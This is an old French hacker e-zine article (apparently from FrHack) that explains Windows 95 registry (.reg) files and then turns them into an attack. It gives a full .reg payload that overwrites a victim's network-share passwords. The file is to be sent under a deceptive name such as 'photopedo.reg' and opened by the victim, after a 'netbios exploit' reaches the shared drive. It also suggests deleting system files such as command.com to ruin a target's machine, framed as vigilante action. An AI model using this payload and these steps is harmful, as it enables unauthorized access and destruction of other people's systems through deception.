-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
                  -= La base de registre: Comment ca marche =-
                                 (Par Utopiste)

Dans les version de windows 3.11 on avait le droit a un paquet de .ini, mais avec l"
arriver de windaube 95, la base de registre qui a prit une importance énorme et a 
pratiquement éliminer les .ini. En gros la base de registre sert a entreproser les 
options de configuration de l'ordinateur et des logiciels. c'est informations sont 
stocker dans les fichier user.dat et system.dat, le fichier system.dat comprend les 
informations global a tous les utilisateur et au matériel, alors que le user.dat 
stocke seulement les informations pour un utilisateur (c'est pour ca que chaque 
utilisateur de windaube peut avoir ses préférence a lui)

Comment peut-on hacker avec la page de registre... c'Est simple, en allant modifier	
des donné de configuration à l'intérieur, on peut ainsi souvent enlever des protections
, devier des outputs sur d'autre fichier, et enlever des mot de passe (vous pouvez pas
toujours trouver le mot de passe, cepandant vous pouvez mettre l'option: mot de passe actif
a faux...)

Pour acceder a la base de registre manuellement on peut utiliser l'application:
RegEdit.exe (qui vient avec windaube). Le fonctionnement est simple et amuser vous dedans
voir comment c'est construit

Je vous montrerai po comment aller modifier la base de registre manuellement dans cet 
article pour ceux qui sont intéresser aller lire l'api de windows, la fonction est
writeprofilestring si je me rappelle bien (je dit ca de mémoire)


Bon maintenant comment faire des fichier .reg
les fichier ayant l'extension .reg mettre a jour directement la base de registre comme
il le fichier mets les informations avant et apres dit a l'utilisateur qui viens
de modifier la base de registre, nous somme souvent correcte dans la pluspart des
cas

Structure d'un fichier .reg

---------< Couper ici> -----------------

REGEDIT4
; Ceci est un exemple fichier mettant à jour la base de registre
; les ligne commancant par un ; sont des commentaire

;========================================
;  Faire que la page de démarrage de windaube inet explorer devienne la page de frhack
;========================================

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer]
"start page"="www.frhack.org"

; la ligne [] signifi la clé, la " " avant le = est pour la sous-clé
; et le "" est pour la valeur de cet clé (en passant les "" sont obligatoire)

--------< Couper ici >------------------

Bon passons a des exemple plus pratique: vous trouvez un pédophile sur internet, décider à aider
la planete vous voulez scraper son ordi (Truc: comme il s'agit d'un pédophile con et lame, 
enlever seulement les fichier genre le command.com et marquer dans l'autoexec.bat en commentaire
une note comme koi qui a des photo de pédo sur l'ordi dans tel répertoire, comme l'ordi sera
scap il va aller le faire réparer et vous avez une chance sur deux que les techniciens le dénonce)
Vous utiliser l'exploir netbios (yé a qq dans ce emag) pis oui, il a a son C partager (toujours 
possible). Cepandant un net use vous apprend qui a mit un mot de passe dessus.
alors que faire ? maintenant plus besoin d'appeller le 911, vous pouvez faire de koi... (bon
a condition que la personne soit d'accord pour ouvrir un fichier genre photopedo.reg (comme les
.reg sont souvent inconnu il risque de dire ok )

parlons plus technique, les mot de passe des ressource partager sont dans la base de registre
(hum, intéressant) il sont coder et j'ai pas encore eu le temps de vérifier l'algorithme
(j'ai penser a écrire cet article 1 heure avant la sorti de frhack # 1) mais on va se simplifier
la vie (l'informatique sert a ca) pis voila ce qu'on va faire:

1) se faire une ressource partager et marquer un mot de passe que l'on veut (celui qui se 
retrouvera sur l'ordi du gars plus tard) (on a fait le test avec frhack)

(je tiens a remercier bubble qui m'a servi de cobaye pour ce test)

2) Aller dans la base de registre à la clé suivante:
Local machine->software->microsoft->windows->

3) localiser vous devriez voir deux sous-clé
   1) "parm1enc"="73 C8 05 E7 10 E2"
   2) "parm2enc"="73 C8 05 E7 10 E2"

73,C8,05,E7,10,E2
la premiere contient le mot de passe de lecture, l'autre de l'écriture


4) copier la valeur a quelque part pour pas l'oublier
   
5) créer un fichier texte (qui sera un .reg)

---------< couper ici >----------------

REGEDIT4
; changer le mot de passe de la ressource partager C par le mot de passe frhack
;  (c) Utopiste
; 


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\C]
"parm1enc"=hex:73,C8,05,E7,10,E2,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00
"parm2enc"=hex:73,C8,05,E7,10,E2,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00


; (note: remplacer C par la ressource partager) et comme valeur marque ce que vous avez
; noter quand vous avez noter le mot de passe de votre ressource parager
; je suis po sur si ca prend le paquet de 0 mais je manque de temps pour tester 
; c'est p-e pas très clair mais en tout cas ca vous dit les principes de bases
; 

----------< couper ici >---------------

Envoyer le fichier au gars, quand il l'ouvrira en double cliquant dessus ca va modifier
son mot de passe de sa ressource partager

Comme prochain article vous aurez un petit texte sur l'utilisation des .inf et peut-etre
aussi un complement sur les .reg (j'ignore encore s'il va parraitre dans les emag de FrHack
ou dans celui de TC (je leur ai promit un article))

J'espere que ce petit truc vous sera utile

                         Utopiste
                  (Utopiste@hotmail.com)